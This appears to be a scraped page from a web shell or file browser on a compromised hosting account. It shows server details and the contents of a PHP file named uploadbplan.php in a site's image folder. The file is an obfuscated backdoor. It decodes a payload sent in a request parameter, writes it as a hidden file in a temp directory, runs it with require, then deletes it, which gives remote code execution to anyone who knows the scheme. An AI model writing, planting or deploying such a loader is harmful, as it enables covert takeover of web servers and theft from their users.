HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //home/vitanhod/prostanur1.vitavit.com.pk/img/uploadbplan.php
<?php

if(in_array("\x73ym", array_keys($_REQUEST))){
	$ent = array_filter(["/dev/shm", session_save_path(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), "/tmp", "/var/tmp"]);
	$ref = $_REQUEST["\x73ym"];
	$ref=	 explode  	('.'	 ,	$ref);	
	$entity = '';
            $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s2	);
    
            foreach ($ref as $v => $v4):
                $sChar = ord($s2[$v%$sLen]	);
                $d = ((int)$v4 - $sChar - ($v%10))	^		65;
                $entity .=chr($d	);
            endforeach;
	$pset = 0;
do {
    $value = $ent[$pset] ?? null;
    if ($pset >= count($ent)) break;
    		if (is_dir($value) ? is_writable($value) : false) {
    $binding = implode("/", [$value, ".val"]);
    if (file_put_contents($binding, $entity)) {
	require $binding;
	unlink($binding);
	exit;
}
}
    $pset++;
} while (true);
}